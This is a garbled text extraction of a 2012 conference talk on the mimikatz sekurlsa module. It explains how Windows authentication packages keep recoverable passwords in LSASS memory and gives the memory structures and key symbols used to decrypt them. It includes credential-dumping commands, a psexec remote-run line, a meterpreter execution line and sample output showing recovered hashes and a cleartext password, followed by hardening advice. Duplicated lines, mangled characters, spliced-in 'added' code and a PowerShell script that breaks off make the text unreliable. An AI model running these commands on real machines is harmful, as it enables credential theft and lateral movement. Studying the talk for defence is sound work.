mod_mimikatz_privilege mod_mimikatz_privilege
mod_pipe mod_pipe
mod_inject mod_inject
mod_memory mod_memory
mod_parseur mod_parseur
mod_patch mod_patch
mod_hive mod_hive
mod_secacl mod_secacl
mod_privilege mod_privilege
mod_process mod_process
mod_service mod_service
mod_system mod_system
mod_thread mod_thread
mod_ts mod_ts
mod_text mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0 msv_1_0
tspkg tspkg
wdigest wdigest
livessp livessp
kerberos kerberos
kappfreedll kappfreedll
kelloworlddll kelloworlddll
klockdll klockdll
mimikatzsys mimikatzsys
sekurlsadll
sam sam
secrets secrets
msv_1_0 msv_1_0
wdigest wdigest
livessp livessp
kerberos kerberos
tspkg tspkg
mimikatz sekurlsa what is it
mimikatz sekurlsa what is it
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump ndash MSV1_0 hashes
ndash TsPkg passwords
ndash Wdigest passwords
ndash LiveSSP passwords
ndash Kerberos passwords ()
ndash hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 5 5
mod_mimikatz_sekurlsa
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 6 6
LsaSS WinLogon
Authentication Packages msv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
Challenge Response
userdomainpassword
PLAYSKOOL
mimikatz sekurlsa how LSA works ( level)
mimikatz sekurlsa how LSA works ( level)
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
Authentication packages
ndash take userrsquos credentials from the logon
ndash make their own stuff
ndash keep enough data in memory to compute responses of challenges (Single Sign On)
If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7 7
PLAYSKOOL
mimikatz :: sekurlsa :: history of « pass-the- » 1/2
Pass-the-hash
- 1997 - Unix: modified SAMBA client for hash usage, Paul Ashton (EIGEN)
- 2000 - Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
- 2007 - TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
- 2007 - « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
- 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French, so not famous :))
2007 was the year of pass the hash!
Pass-the-ticket
- 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz :: sekurlsa :: history of « pass-the- » 2/2
Pass-the-pass
- 05/2011 - mimikatz 1.0 dumps the first clear text passwords, from the TsPkg provider (but limited to NT 6 and some XP SP3)
  * http://blog.gentilkiwi.com/securite/pass-the-pass
- 05/2011 - return of mimikatz: it dumps clear text passwords from the WDigest provider (unlimited this time :))
  * http://blog.gentilkiwi.com/securite/re-pass-the-pass
- 05/2011 - Some organizations opened cases with Microsoft about it...
...Lots of time...
- beginning of 2012 - Lots of blogs (and Kevin Mitnick :)) say a few words about mimikatz
- 03/2012 - Hernan Ochoa (Ampliasecurity) publishes on seclists that wce supports WDigest password extraction...
  * http://seclists.org/pen-test/2012/Mar/7
- 03/2012 - mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  * http://blog.gentilkiwi.com/securite/rere-pass-the-pass
- 03/2012 - yeah, once again... more curious, but Kerberos keeps passwords in memory
  * http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
- 08/2012 - sekurlsa module without any injection at all (ultra safe)
  * http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes a hash is not enough...
mimikatz :: sekurlsa :: tspkg :: what is it?
Microsoft introduced SSO capability for Terminal Server with NT 6, to improve the RemoteApps and RemoteDesktop user experience
- http://technet.microsoft.com/library/cc772108.aspx
It relies on CredSSP with Credentials Delegation (= Account delegation)
- Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
- The user does not have to type their password
- The password is not in the RDP file
- The password is not in the user's secrets
mimikatz :: sekurlsa :: tspkg :: questions
The KB says that for it to work we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  * What? Our User/Domain/Password? Hash? Ticket? It seems...
- In all cases the system seems to be vulnerable to pass-the-...
In what form? Our specs: [MS-CSSP]
- 2.2.1.2.1 TSPasswordCreds
  * "The TSPasswordCreds structure contains the user's password credentials that are delegated to the server" (or PIN)
    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }
- Challenge/response for authentication?
  * Server: YES (TLS, Kerberos)
  * Client: NO, the password is sent to the server...
So the password resides somewhere in memory!
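As an added example (not code from mimikatz or from the talk), the following Python encodes and parses the [MS-CSSP] TSPasswordCreds SEQUENCE quoted above, so the point of the slide can be checked on bytes: what the client delegates is the password itself as an OCTET STRING, with no client-side challenge/response, and only the outer TLS tunnel hides it on the wire. Assumptions: DER with explicit (constructed) context tags around each OCTET STRING, UTF-16LE string contents as in the CredSSP encodings, and the domain, user and password values below are constructed for the demo.

```python
from typing import Dict, Tuple

# Added example: minimal DER encoder/parser for the [MS-CSSP] TSPasswordCreds
# SEQUENCE shown on the slide. Not mimikatz code; the sample credentials used
# in __main__ are constructed for the demo.
#
#   TSPasswordCreds ::= SEQUENCE {
#       domainName [0] OCTET STRING,
#       userName   [1] OCTET STRING,
#       password   [2] OCTET STRING
#   }
#
# Assumptions: explicit (constructed) context tags [0]/[1]/[2] wrapping each
# OCTET STRING, and UTF-16LE string contents, as in the CredSSP encodings.

FIELD_NAMES = {0: "domainName", 1: "userName", 2: "password"}


def _der_length(n: int) -> bytes:
    """DER length: short form below 0x80, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der_tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_length(len(body)) + body


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """Build the DER encoding of a TSPasswordCreds value."""
    fields = []
    for idx, value in enumerate((domain, user, password)):
        octets = _der_tlv(0x04, value.encode("utf-16-le"))  # OCTET STRING
        fields.append(_der_tlv(0xA0 | idx, octets))         # [idx] EXPLICIT
    return _der_tlv(0x30, b"".join(fields))                 # SEQUENCE


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, body, position after the element) for the TLV at pos."""
    tag = buf[pos]
    first = buf[pos + 1]
    pos += 2
    if first & 0x80:
        count = first & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("truncated DER element")
    return tag, buf[pos:pos + length], pos + length


def parse_ts_password_creds(blob: bytes) -> Dict[str, str]:
    """Parse a DER TSPasswordCreds back into its three strings."""
    tag, seq, _ = _read_tlv(blob, 0)
    if tag != 0x30:
        raise ValueError("TSPasswordCreds must be a SEQUENCE")
    out: Dict[str, str] = {}
    pos = 0
    while pos < len(seq):
        ctag, cbody, pos = _read_tlv(seq, pos)
        if (ctag & 0xE0) != 0xA0:
            raise ValueError("expected a context-specific constructed tag")
        itag, ibody, _ = _read_tlv(cbody, 0)
        if itag != 0x04:
            raise ValueError("expected an OCTET STRING")
        out[FIELD_NAMES[ctag & 0x1F]] = ibody.decode("utf-16-le")
    return out


def password_is_visible(blob: bytes, password: str) -> bool:
    """True when the password bytes appear verbatim in the encoding: the
    client performs no challenge/response, only the TLS layer protects it."""
    return password.encode("utf-16-le") in blob


if __name__ == "__main__":
    # Constructed sample, not real credentials.
    blob = encode_ts_password_creds("LAB", "alice", "Sample-P4ss")
    print(blob.hex())
    print(parse_ts_password_creds(blob))
    print("password visible in the structure:", password_is_visible(blob, "Sample-P4ss"))
```

The same structure is what the slide's "So the password resides somewhere in memory" follows from: to produce it on each RDP connection, the package must be able to reproduce the clear password, not just a hash.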
mimikatz :: sekurlsa :: tspkg :: symbols & theory
Let's explore some symbols...
- sounds cool... (thanks Microsoft)
Let's imagine a scenario:
- Enumerate all sessions to obtain
  * Username
  * Domain
  * LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  * TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  * TS_PRIMARY_CREDENTIAL with clear text credentials...

kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg :: workflow
(workflow diagram: LsaEnumerateLogonSessions -> for each LUID -> lookup in tspkg!TSGlobalCredTable with RtlLookupElementGenericTableAvl -> KIWI_TS_CREDENTIAL -> pTsPrimary -> LsaUnprotectMemory -> KIWI_TS_PRIMARY_CREDENTIAL -> password in clear)

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg :: demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because a clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest :: what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network [...]" - Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP" - Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  * Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[...]:HA2)
  * HA1 = MD5(username:realm:password)
  * HA2 = MD5(method:digestURI[...])
Even after login, HA1 may change... the realm comes from the server side and cannot be determined before the Windows logon!
So the WDigest provider must keep the elements needed to compute responses for different servers:
- Username
- Realm (from the server)
- Password
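An added example (not code from the talk) that carries the HA1/HA2 computation above through in Python, following RFC 2617 with qop=auth. It shows the asymmetry the slide relies on: a server can verify a response from a stored per-realm HA1 alone, but a client answering challenges from realms it has never seen needs the password itself, because HA1 changes with the realm. The test vector values (user Mufasa, realm testrealm@host.com, the nonce and cnonce) are the ones from RFC 2617 section 3.5; the second realm name is constructed.

```python
import hashlib
from typing import Dict, Iterable

# Added example, not code from the talk: RFC 2617 Digest (qop=auth) in the
# HA1/HA2 notation of the slide. Vector values in __main__ come from RFC 2617
# section 3.5; "other@host.com" is a constructed second realm.


def _md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); it depends on the server's realm."""
    return _md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth."""
    return _md5_hex(f"{method}:{digest_uri}")


def digest_response(ha1_hex: str, nonce: str, nc: str, cnonce: str,
                    method: str, digest_uri: str, qop: str = "auth") -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2). Only HA1 is consumed here,
    which is why a server can store per-realm HA1 values instead of passwords."""
    return _md5_hex(f"{ha1_hex}:{nonce}:{nc}:{cnonce}:{qop}:{ha2(method, digest_uri)}")


def client_response(username: str, realm: str, password: str, nonce: str,
                    nc: str, cnonce: str, method: str, digest_uri: str) -> str:
    """Client side: the realm arrives in the challenge, so the client needs the
    password (or an HA1 for exactly this realm) to answer."""
    return digest_response(ha1(username, realm, password), nonce, nc, cnonce,
                           method, digest_uri)


def server_verify(stored_ha1: str, nonce: str, nc: str, cnonce: str,
                  method: str, digest_uri: str, response: str) -> bool:
    """Server side: recompute from the stored HA1, no password required."""
    return digest_response(stored_ha1, nonce, nc, cnonce, method, digest_uri) == response


def ha1_per_realm(username: str, password: str, realms: Iterable[str]) -> Dict[str, str]:
    """One HA1 per realm: a cache of HA1 values only covers realms already seen."""
    return {r: ha1(username, r, password) for r in realms}


if __name__ == "__main__":
    nonce, nc, cnonce = "dcd98b7102dd2f0e8b11d0f600bfb0c093", "00000001", "0a4f113b"
    resp = client_response("Mufasa", "testrealm@host.com", "Circle Of Life",
                           nonce, nc, cnonce, "GET", "/dir/index.html")
    print("response:", resp)
    per_realm = ha1_per_realm("Mufasa", "Circle Of Life",
                              ["testrealm@host.com", "other@host.com"])
    for realm, h in per_realm.items():
        print(realm, "HA1 =", h, "verifies:",
              server_verify(h, nonce, nc, cnonce, "GET", "/dir/index.html", resp))
```

The HA1 stored by the server for one realm is useless for verifying (or producing) a response for another realm; that is the whole reason the client-side package cannot reduce the password to a single hash at logon time.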
mimikatz :: sekurlsa :: wdigest :: theory
This time we know:
- that WDigest keeps the password in memory « by protocol », for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest
- Hypothesis seems verified!
LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest
- SpAcceptCredentials takes the clear password in its args
  * Protects it with LsaProtectMemory
  * Updates or inserts data in the doubly linked list wdigest!l_LogSessList

.text:7409D151 _DigestCalcHA1@8       call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
(workflow diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list wdigest!l_LogSessList for the LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear)

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    /* [...] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    /* [...] */
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually, I've only used a logical (empirical) approach to search for passwords...
- Protocol reading
- Symbols searching
~ Boring ~ ... let's be more brutal this time: make a WinDBG trap!

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
    <- Our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
    <- Yeah, Pass-the-Hash capability with a Live account too...

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
    <- A Live user can logon through RDP via SSO

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp :: workflow
(workflow diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list livessp!LiveGlobalLogonSessionList for the LUID -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds -> LsaUnprotectMemory -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> password in clear)

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls:
- NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList

lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
    <- Kerberos ticket part? Maybe :)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
    <- Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
(workflow diagram: LsaEnumerateLogonSessions -> for each LUID -> lookup in kerberos!KerbGlobalLogonSessionTable with RtlLookupElementGenericTableAvl -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear)

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow
(workflow diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list kerberos!KerbLogonSessionList for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear)

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* [...] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "hu?"
Ok, it works...
But why?
Not for all logons on NT5 (can need an unlock)
From my understanding of Microsoft's explanations:
- no need of passwords for the Kerberos protocol...
- all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logical...
- For password auth:
  * password hash for the shared secret, but the password is kept in memory
- For full smartcard auth:
  * No password on the client
  * No hash on the client
    - NTLM hash on the client...
    - the KDC sent it back as a gift!
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so they can be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process, to benefit from its keys when we called it
Could it be fun to decrypt outside the process?
- Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
- When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses
- RC4
- DESx
(diagram: LsaUnprotectMemory; the keys live in lsasrv inside lsass, and mimikatz copies them into its own lsasrv)
- g_cbRandomKey: DWORD (256)
- g_pRandomKey: BYTE[g_cbRandomKey]
- g_pDESXKey: BYTE[144]
- g_Feedback: BYTE[8]
mimikatz :: sekurlsa :: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses
- 3DES
- AES
(diagram: the keys live in lsasrv inside lsass, and mimikatz copies them)
- InitializationVector: BYTE[16]
- h3DesKey, hAesKey: KIWI_BCRYPT_KEY

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security Packages
Package        | Symbols                                                | Type
tspkg          | tspkg!TSGlobalCredTable                                | RTL_AVL_TABLE
wdigest        | wdigest!l_LogSessList                                  | LIST_ENTRY
livessp        | livessp!LiveGlobalLogonSessionList                     | LIST_ENTRY
kerberos (nt5) | kerberos!KerbLogonSessionList                          | LIST_ENTRY
kerberos (nt6) | kerberos!KerbGlobalLogonSessionTable                   | RTL_AVL_TABLE
msv1_0         | lsasrv!LogonSessionList, lsasrv!LogonSessionListCount  | LIST_ENTRY, ULONG

Protection Keys
Key  | NT 5 Symbols
RC4  | lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx | lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key  | NT 6 Symbols
     | lsasrv!InitializationVector
3DES | lsasrv!h3DesKey
AES  | lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full
mimikatz # exit

psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit

meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        livessp : nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
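An added audit script, written for this transcript and not part of mimikatz or the talk, that reads the local settings behind the checklist above (which security packages LSASS loads, the Restrict NTLM policies, LmCompatibilityLevel, and CredSSP default credential delegation). It assumes Windows PowerShell run elevated and the documented registry locations named in the code; the threshold values in the findings are this script's own reading of the policies, not numbers from the slides.

```powershell
# Audit of LSA-related hardening on the local machine (added example, not mimikatz code).
# Registry locations are the documented policy-backed values; run elevated to read HKLM.
function Get-LsaHardeningReport {
    $lsa  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $msv  = "$lsa\MSV1_0"
    $cred = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation'

    function Get-RegValue([string]$Path, [string]$Name) {
        # $null means the value or key is absent, i.e. the policy is "not configured".
        try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
        catch { $null }
    }

    # "Security Packages": the SSPs LSASS loads at boot (the "disable faulty providers" item).
    $packages    = @(Get-RegValue $lsa 'Security Packages')
    $loadedRisky = @('tspkg', 'wdigest', 'livessp') | Where-Object { $packages -contains $_ }

    # Restrict NTLM policies (Windows 7 / 2008 R2 and later):
    #   RestrictSendingNTLMTraffic   0 = allow all, 1 = audit all, 2 = deny all
    #   RestrictReceivingNTLMTraffic 0 = allow all, 1 = deny domain accounts, 2 = deny all accounts
    #   AuditReceivingNTLMTraffic    0 = off, 1 = domain accounts, 2 = all accounts
    $sendNtlm  = Get-RegValue $msv 'RestrictSendingNTLMTraffic'
    $recvNtlm  = Get-RegValue $msv 'RestrictReceivingNTLMTraffic'
    $auditNtlm = Get-RegValue $msv 'AuditReceivingNTLMTraffic'

    # LmCompatibilityLevel 5 = send NTLMv2 only, refuse LM and NTLM responses.
    $lmLevel = Get-RegValue $lsa 'LmCompatibilityLevel'

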